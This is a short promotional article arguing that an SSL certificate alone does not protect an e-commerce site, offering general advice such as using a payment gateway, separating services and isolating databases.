Does SSL really protect my e-commerce website?

Rhetorically speaking, does an airbag protect you from a fatal car wreck?

The answer is that it could, I'm sure their have been countless lives have been saved by airbags. But the statistics say that passengers with airbags alone and no seatbelt are almost 7 times more likely to sustain a fracture of the spinal cord then those customers who were protected by an airbag and a seatbelt.

http://www.umc.pitt.edu/media/pcc040719/seatbelt_airbag.html

What do airbags and seatbelts have to do with your E-Commerce website?

There is a misconception that an SSL certificate is an end all, be all solution for protecting your website and your sensitive information from hackers. Like the airbag, its effectiveness really weighs in when it is combined with other protections.

You wouldn't put your family in a vehicle that was missing doors, windshields, and bumpers and feel secure because you had airbags installed; yet there are family fortunes riding on technology solutions that are as shaky.

It is true that 128 Bit SSL encryption and above is not worth a hackers time to try to decrypt but why would they when it is so much easier to access your server through a software vulnerability in your bulletin board or blog, or an insecure password. Once you've been compromised they can easily alter your shopping cart process with out your knowledge and have your customer's credit card information emailed to their anonymous email account.

The odds of success are in the hackers favor due to the nature of software development. There is no such thing as hacker-proof software; there are just undiscovered vulnerabilities. What makes matters worse is that many million-dollar web businesses are being run on shared hosting accounts with 300-400 other potentially vulnerable customer websites or dedicated servers without firewalls. The nature of shared hosting is also working against Internet Merchants. Customers are likely to have centralized services such as email, ftp and web in one account. This approach to web hosting is very dangerous to customers that house e-commerce sites on these very same servers. The FTP (File Transfer Protocol) is still the defacto standard for transferring files to and from your website yet it has had a long history of vulnerabilities and even worse it transfers usernames and passwords in clear text that is easily accessible by someone with limited knowledge.

So what can be done to protect your online business? Here are a few guidelines, the first being the most important.

• Stop storing credit card information - Find a way to do business online that does not require that you store credit card information. A Payment Gateway can provide you with a payment page so that credit card information is collected at the gateway not your website. SafeMerchant.com offers customers the ability to tightly integrate with their shopping cart or back end process.
• Separation of duty - Segregate email, chat, bulletin boards, blogs, mailing lists, etc from the server that is running your shopping cart.
• Databases should be locked down and should also be on a different server from the shopping cart.

If you follow this simple program, 99.9999999% of the risk associated with doing business online will be mitigated.